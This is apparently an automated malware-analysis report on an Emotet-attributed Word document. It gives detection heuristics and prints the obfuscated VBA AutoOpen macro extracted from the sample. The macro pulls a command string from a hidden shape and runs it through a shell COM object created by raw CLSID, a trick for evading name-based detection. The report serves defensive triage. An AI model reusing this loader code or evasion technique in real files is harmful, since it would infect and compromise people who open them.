MALICIOUS
252
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1059.001 PowerShell
T1204.002 Malicious File
The sample contains VBA macros with an AutoOpen function, which is a common technique for Emotet. The macros instantiate the dangerous COM class WScript.Shell and reference PowerShell, indicating an attempt to download and execute a second-stage payload. ClamAV detection further supports the Emotet family attribution.
Heuristics 9
-
ClamAV: Doc.Downloader.Emotet-6826446-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Downloader.Emotet-6826446-0
-
VBA macros detected medium 3 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
VBA instantiates a dangerous COM class by CLSID critical OLE_VBA_GETOBJECT_CLSID_DANGEROUSVBA uses GetObject("new:{CLSID}") to instantiate an execution/scripting-capable COM class by its raw CLSID, avoiding the CreateObject ProgID that name-based detection keys on.Matched line in script
End Select Set lWpSaF = GetObject("new:72C24DD5-D70A-438B-8A42-98424B88AFB8" + MRCEVif + cfWwP + fCBpsz + nPYLbD) On Error Resume Next -
GetObject call high OLE_VBA_GETOBJGetObject callMatched line in script
End Select Set lWpSaF = GetObject("new:72C24DD5-D70A-438B-8A42-98424B88AFB8" + MRCEVif + cfWwP + fCBpsz + nPYLbD) On Error Resume Next -
AutoOpen macro low OLE_VBA_AUTOOPENAutoOpen macroMatched line in script
Attribute VB_Customizable = True Sub AutoOpen() On Error Resume Next -
Reference to PowerShell high SC_STR_POWERSHELLReference to PowerShell
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGEOne or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 5001 bytes |
SHA-256: 91524fbfb3a552d96b10feec9f1abe40069d4b908c784baa9e8fd0e0a6770cd4 |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
112 of 173 identifiers look randomly generated (e.g. 'NhQLQfwlaBSJn') — consistent with name-mangling obfuscation.
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "iHOBqSAldadB"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub AutoOpen()
On Error Resume Next
Select Case rssVuadT
Case 7431461
bcPiiiK = CBool(GnVMX)
cRvtrcHL = 131039611
HudsIUj = CBool(OwOPq)
Case 145014689
BzKzRTiVD = CBool(cfjcYRPIp)
oFRvlHM = Atn(aaMbZupdz)
CGcYaz = CBool(pzhpfwHB)
KwhOMKHju = Atn(190796375 * CLng(217435300))
End Select
Set pmuUB = Shapes("NhQLQfwlaBSJn")
On Error Resume Next
Select Case bGtwlAO
Case 234272584
lhAlL = CBool(kNliC)
jobhj = 241503370
WYjvpCIBA = CBool(ZwnjvJjNM)
Case 36830349
rKNWZVuRS = CBool(BPXMdF)
LjCAjPLi = Atn(XlfrUX)
sfNTZQj = CBool(jijXjP)
SEwCdCz = Atn(50389999 * CLng(309798784))
End Select
WzKifFWORWi = "" + fhPmMvC + wJmaw + AjoBzA + tRtcuXS + pmuUB.TextFrame.TextRange.Text + pDSlHaO + GiEzIkt + jikIk + LNmKz + UbpTkTsw
On Error Resume Next
Select Case rHYfT
Case 283156215
mTlapsdw = CBool(KazuGNRok)
nCYvz = 268195053
EStiwcZo = CBool(widBQn)
Case 149083892
CoLEvipj = CBool(KDkOXolGn)
CONwYF = Atn(RnLisAfss)
diIoE = CBool(CSWEBYqru)
cURpqnw = Atn(29794688 * CLng(83148233))
End Select
On Error Resume Next
Select Case tiWhQtm
Case 116477639
jIKwtM = CBool(BCtmQBzm)
ClrtdmQh = 210593100
YHjzTfP = CBool(FTsaaEK)
Case 136987834
wdNsijzOH = CBool(YltrcSUnc)
FZHBWtT = Atn(bLmjJwUES)
qXiiMkrs = CBool(bPIFQh)
kWWMVoQGm = Atn(317801614 * CLng(56140133))
End Select
Set lWpSaF = GetObject("new:72C24DD5-D70A-438B-8A42-98424B88AFB8" + MRCEVif + cfWwP + fCBpsz + nPYLbD)
On Error Resume Next
Select Case zNrwwL
Case 68721804
otcqjXQU = CBool(BWjFsCc)
cTNEtvM = 151166701
XijmhD = CBool(dwwhnrN)
Case 159090100
JZjJMFKP = CBool(TrwcuzP)
PzhkkU = Atn(GbvEvl)
GpRkWfND = CBool(YTMNLd)
BBRTb = Atn(87935855 * CLng(282064522))
End Select
On Error Resume Next
Select Case hpIwX
Case 110413520
pGmSwRUXM = CBool(NHfBvFU)
TDjMDT = 6529678
MPllw = CBool(FftuXj)
Case 263227701
AuFPMS = CBool(DmkohDN)
dDTRvF = Atn(maiwC)
IAhnd = CBool(CpGoG)
aIdAzPMr = Atn(101102913 * CLng(106969043))
End Select
Const RmcCa = 0
On Error Resume Next
Select Case pmaMFKnK
Case 293360880
jcDLa = CBool(HjiXiGm)
ZMmTZDZz = 126278805
kSBEvQL = CBool(CzPLrC)
Case 85041545
OcZUCiz = CBool(nsXUlociJ)
bHXDkOM = Atn(EpSNUk)
wpzYw = CBool(CTJRDsq)
NUhCRaF = Atn(22526869 * CLng(74229139))
End Select
On Error Resume Next
Select Case ZWprZjMP
Case 211837363
kAwHZJPD = CBool(WXsHuwKTz)
YrRAahHlD = 193622773
GuMRjLSJk = CBool(uOIBI)
Case 216439552
vsONPW = CBool(qSzYZ)
YMatQd = Atn(qOmsJMki)
JzSAspK = CBool(jrYEaN)
tkRkio = Atn(92914447 * CLng(244321475))
End Select
On Error Resume Next
Select Case RZbIIz
Case 172545123
fPdiTNI = CBool(UtuvVBKNz)
BflPU = 213595769
siCSP = CBool(nrZPIL)
Case 17009969
jwtYK = CBool(MuPONKBz)
tPuwbaiGi = Atn(aGEvm)
CvzVi = CBool(rKuuwPnEE)
qwjzNO = Atn(176355816 * CLng(228591513))
End Select
On Error Resume Next
Select Case NjfbdM
Case 300889489
dXqSa = CBool(wjpZYv)
ETZALmtb = 221284423
jLzCYjLKa = CBool(HtVlFzA)
Case 266104435
wAUuWI = CBool(FbRazf)
fJHdMaAiP = Atn(UhKzouLlF)
lrLRat = CBool(iksza)
zqbwWnO = Atn(102803920 * CLng(121113587))
End Select
On Error Resume Next
Select Case TASoZLpmA
Case 259174217
pOUcNrUa = CBool(VJBcfuAPt)
bfNUjKiGF = 301322238
CokWtdL = CBool(OwuObVK)
Case 336269912
JiKatELIc = CBool(kSflPjYSU)
FlRplf = Atn(hRlwZKswa)
zJjZORjb = CBool(iNiiDC)
ijXNVpOIi = Atn(284168830 * CLng(281235694))
End Select
lWpSaF.Run# WzKifFWORWi, RmcCa
On Error Resume Next
Select Case SwXPMw
Case 264960689
WvcDizt = CBool(cklritc)
ialXMJWUH = 298761793
XZTvEiIl = CBool(dIwvdO)
Case 311931377
sMmYUclm = CBool(QQNYI)
pRWFJpjJW = Atn(QRWiq)
zNkbuHHDw = CBool(JuRsXnVM)
dHJmw = Atn(79740558 * CLng(21389483))
End Select
On Error Resume Next
Select Case YOYjilLEj
Case 107707173
DYshJzQXc = CBool(oknNw)
EjoWcuC = 301418533
QLCKdIVWT = CBool(juVTKCz)
Case 131585393
jilSkLHU = CBool(uOIWwotmO)
wATOTk = Atn(fiPdTf)
RJOisSz = CBool(oabFTMw)
aYokVkQQ = Atn(121684110 * CLng(224527147))
End Select
End Sub
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.